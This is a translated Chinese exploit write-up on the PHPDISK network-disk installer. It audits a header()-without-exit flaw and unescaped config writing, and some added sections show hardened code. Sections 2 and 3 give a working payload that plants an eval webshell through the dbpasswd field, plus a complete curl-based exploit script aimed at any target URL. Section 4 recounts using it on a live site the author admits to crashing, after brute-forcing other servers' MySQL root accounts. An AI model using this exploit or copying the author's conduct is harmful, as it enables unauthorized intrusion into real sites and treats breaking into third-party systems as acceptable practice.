Author: Yaseng Team: CodePlay
1: Code Audit
PHPDISK is a network disk (file storage management) system built with PHP and MySQL that is widely used in China. While analysing its source code I found something very interesting.....
Figure 1
Figure 1 shows index.php under install/, the program's installation file. It looks like normal code: once the system has been installed, a lock file is generated, and the code checks for that file when install is run again. The check issues a header() redirect, but there is no exit after it. After PHP sends the header, the rest of the script keeps executing, so you can simply POST the data directly and then check the file again.
Figure 2
The installation process is driven by $step, and step can be controlled via POST. Let's keep looking for a usable spot.
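To make the header-without-exit point concrete, here is an added illustration (not PHPDISK's own code) of the lock check in its vulnerable shape and in a hardened shape; the lock-file path and step handling are assumptions.

```php
<?php
// Added illustration (not PHPDISK's code): the install-lock check in its
// vulnerable and hardened forms. LOCK_FILE and the step handling are assumed.

const LOCK_FILE = __DIR__ . '/install.lock';

// Vulnerable pattern: header() without exit. Sending a Location header does
// not stop the script; PHP keeps executing, so a POSTed step still reaches
// the installer while the browser merely follows a redirect.
function run_installer_insecure(array $post): string
{
    if (file_exists(LOCK_FILE)) {
        header('Location: ../index.php');
        // no exit here: everything below still runs
    }
    $step = (int)($post['step'] ?? 1);
    return "install step $step executed";
}

// Hardened: stop right after the redirect. It is exit, not the header,
// that prevents the installer from running a second time.
function run_installer_secure(array $post): string
{
    if (file_exists(LOCK_FILE)) {
        header('Location: ../index.php', true, 302);
        exit;
    }
    $step = (int)($post['step'] ?? 1);
    return "install step $step executed";
}

// When installation completes, create the lock atomically ('x' fails if the
// file already exists) so two concurrent installs cannot both succeed.
function finish_install(): void
{
    $fp = @fopen(LOCK_FILE, 'x');
    if ($fp === false) {
        exit('already installed');
    }
    fwrite($fp, date('c'));
    fclose($fp);
}
```

Removing or web-server-blocking the install/ directory after setup is a further safeguard that does not rely on the PHP check at all.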
$str = "<?php".LF.LF;
$str .= "// This is PHPDISK auto-generated file. Do NOT modify me.".LF.LF;
$str .= "\$configs = array(".LF.LF;
$str .= "\t'dbhost' => '$dbhost',".LF.LF;
$str .= "\t'dbname' => '$dbname',".LF.LF;
$str .= "\t'dbuser' => '$dbuser',".LF.LF;
$str .= "\t'dbpasswd' => '$dbpasswd',".LF.LF;
$str .= "\t'pconnect' => 0,".LF.LF;
$str .= "\t'tpf' => 'pd_',".LF.LF;
$str .= "\t'charset' => '$charset',".LF.LF;
$str .= "\t'debug' => '0',".LF.LF;
$str .= ");".LF.LF;
$str .= "define('admincp', 'admincp');".LF;
$str .= "?>".LF;
$fp = fopen($config_file, 'w');
if (!$fp) {
    exit("Can not open file <b>$config_file</b>.");
}
if (is_writable($config_file)) {
    if (@fwrite($fp, $str)) {
        $msg .= "<font color=blue>{$config_file}"._('write_success')."</font>";
    } else {
        // ... error branch omitted in the write-up
    }
}
The POSTed data is written straight into the configuration file configs.inc.php, which is worth a closer look.
function stripslashes_array(&$array) {
    if (is_array($array)) {
        foreach ($array as $k => $v) {
            $array[$k] = stripslashes_array($v);
        }
    } else if (is_string($array)) {
        $array = stripslashes($array);
    }
    return $array;
}
if (@get_magic_quotes_gpc()) {
    $_GET  = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}
Haha, for ease of installation the gpc escaping is stripped off, so a Trojan (webshell) can be written directly.
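The two snippets above (string-interpolated config writer plus stripslashes) are the whole problem. As an added illustration that is not PHPDISK's code, the following contrasts that pattern with generating the file through var_export(), which quotes every value correctly; the field whitelist and regexes are assumptions.

```php
<?php
// Added illustration (not PHPDISK's code): writing configs.inc.php by
// interpolating POSTed values into PHP source versus emitting them with
// var_export(). The whitelist and validation rules below are assumptions.

// Vulnerable pattern: the value is dropped inside single quotes verbatim.
// A quote in the value closes the literal and whatever follows becomes PHP
// code the next time the config file is included. Whether magic_quotes_gpc
// was on or off is irrelevant; quoting must happen where the file is built.
function build_config_insecure(array $c): string
{
    $s = "<?php\n\$configs = array(\n";
    foreach ($c as $k => $v) {
        $s .= "\t'$k' => '$v',\n";
    }
    return $s . ");\n";
}

// Hardened: validate identifiers that have a known shape, keep only the
// expected keys, and let var_export() produce correctly escaped literals.
function build_config_secure(array $c): string
{
    if (!preg_match('/^[A-Za-z0-9_.:-]+$/', $c['dbhost'] ?? '') ||
        !preg_match('/^[A-Za-z0-9_]+$/', $c['dbname'] ?? '') ||
        !preg_match('/^[A-Za-z0-9_]+$/', $c['dbuser'] ?? '')) {
        throw new InvalidArgumentException('bad database identifier');
    }
    $allowed = ['dbhost', 'dbname', 'dbuser', 'dbpasswd', 'charset'];
    $clean = array_intersect_key($c, array_flip($allowed));
    return "<?php\n\$configs = " . var_export($clean, true) . ";\n";
}

// Constructed sample input: a password that tries to break out of the quotes
// (a harmless echo stands in for anything an attacker might put there).
$post = [
    'dbhost'   => 'localhost',
    'dbname'   => 'phpdisk',
    'dbuser'   => 'phpdisk',
    'dbpasswd' => "x',); echo 'injected'; //",
];

echo build_config_insecure($post), "\n"; // 'dbpasswd' => 'x',); echo 'injected'; //',
echo build_config_secure($post), "\n";   // 'dbpasswd' => 'x\',); echo \'injected\'; //',
```

In the insecure output the literal ends after x and the echo is live code; in the var_export() output the embedded quotes are escaped as \' and the whole value stays a string.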
2: Vulnerability Exploitation & getShell Method
Find the place where the configuration is written:
$_l = mysql_connect($dbhost, $dbuser, $dbpasswd) or die(_('could_not_connect').mysql_error());
if (!mysql_select_db($dbname, $_l)) {
    mysql_query("create database `{$dbname}`;") or die(_('invalid_query').mysql_error());
}
@mysql_close($_l);
It verifies that the database can be connected to, and exits if the database information is wrong, so we cannot write arbitrary values there. Only dbpasswd is left to work on.
First, let's picture what the resulting configs.inc.php under system/ would look like:
'dbpasswd' => '',);?><?php eval($_POST['y']);?>',
You could then connect to it directly with a kitchen knife (the China Chopper webshell client).
Because there is no annoying gpc, directly POST 'dbpasswd' = '',);?><?php eval($_POST['y']);?>'
That is, the password is: ',);?><?php eval($_POST['y']);?>
The data to POST is then:
$pass = '\',);?><?php eval($_POST[\'y\']);?>';
$data = "step=5&dbhost=localhost&dbuser=yaseng&dbname=yaseng&dbpasswd=".$pass;
When the database information is correct, the Trojan is written successfully.
Figure 4
Figure 4: the shell was written successfully.
3: Writing the getShell exp
Enough imagining. We'll use PHP's powerful curl to write the exp. The POST data was constructed in the previous section; afterwards we check whether getShell succeeded by looking for a characteristic string. The specific code is as follows (for the complete exp, see the attachment).
<?php
$site = $argv[1]; // target website
$url  = $site."/install/index.php";
$pass = '\',);?><?php eval($_POST[\'y\']);?>';
$data = "step=5&dbhost=98.126.4.252&dbuser=root&dbname=mysql&dbpasswd=".$pass; // exploit data
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data); // send POST data
$result = curl_exec($ch);
curl_close($ch);
$shell = "http://".$site.'/system/configs.inc.php';
if (strpos(@file_get_contents($shell), 'pconnect')) { // check whether the shell was written
    echo "Hi guy I get the Shell: ".$shell;
} else {
    echo "Shit !!! This Site: $site Can not get Shell";
}
4: Practical Demonstration
In fact, this way of getting a shell is extremely wicked: it destroys configs.inc.php and crashes the whole site. I found a relatively new site (which by the look of it nobody was using). Forgive me...... a bit of practice.
I was looking for an externally reachable database. I went through x shells in my kitchen knife, but none of them allowed external connections. I asked a friend for a MySQL root brute-force tool and cracked a batch of root accounts.
Grab an adminer (a single-file PHP MySQL management client) and change the password. The data sent at this point is as follows (if it doesn't work, use a MySQL server that accepts external connections):
$pass = '\',);?><?php eval($_POST[\'y\']);?>';
$data = "step=5&dbhost=98.126.4.252&dbuser=root&dbname=mysql&dbpasswd=".$pass;
Run php phpdisk.php www.2cto.com on the PHP command line.
Done: written successfully and connected with the kitchen knife.
Ko !!!
5: Conclusion
This is a typical case of bypassing a header() redirect. PHP's functions are powerful and easy to use, but dangerous ones such as header(), preg_replace() and eval() must be used with care so they cannot be abused.